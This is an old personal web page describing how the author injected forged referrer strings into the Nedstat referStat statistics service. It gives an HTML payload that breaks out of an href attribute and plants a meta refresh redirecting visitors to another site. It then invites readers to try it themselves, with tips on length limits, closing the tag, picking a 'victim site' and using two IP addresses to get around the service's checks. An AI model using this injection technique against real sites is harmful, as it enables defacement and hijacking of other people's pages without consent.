|
Around mid-january I added the referStat from Nedstat, a service which also get the
refferring page (URL) from your visitors. I saw it was done with some simple Javascript using the document.referrer
property and the escape(string s) build-in function of a browser.
But then I thought: Information is written to the server, what if I filled in some
information instead of the browser. Guess what? It worked! That escape(string s) gives
a string back which is converted to a 'standard' URL-encoded format, so I made a converter (look below). I first
tried to insert silly stuff like some vague linx like http://www.satan.com
. Then more serious stuff like this:
http:"><meta http-equiv=refresh content=5;fly.to/55>
After 5 seconds the page switches to the Quake Clan BQD where I'm member of. Cool huh?
End february Nedstat had a countermeasure and now filters all tags out of the referstrings,
but still you can insert 25 lines of 52-7=45 characters of plain text.
I found out that the string (say http://bqd.bikkel.com) you give to the Nedstat
server is processed and put into the statistic page like this:
... somewhere ... <a href="http://bqd.bikkel.com">bqd.bikkel.com</a> ... something else ...
That's 2 times, and from the last is the http:// stripped...
Now try it yourself below
Notes
- There has to be a http: in front of the string because the won't except it. (It replaces it for a stupid
message)
- Maximum length of the string to insert is 47 characters. (My string input field is 47+5=52 characters long)
- You have 25 lines to fill, that means 25 times to put a string of 47 characters in the page
- If you want to insert HTML tags of your own, be sure to close the href tag with: http:">
- Be sure to not have visited your victim site before because Nedstat then doesn't want to accept your referrer
URL
- Use at least 2 computers with different ip addresses if you want to see some result |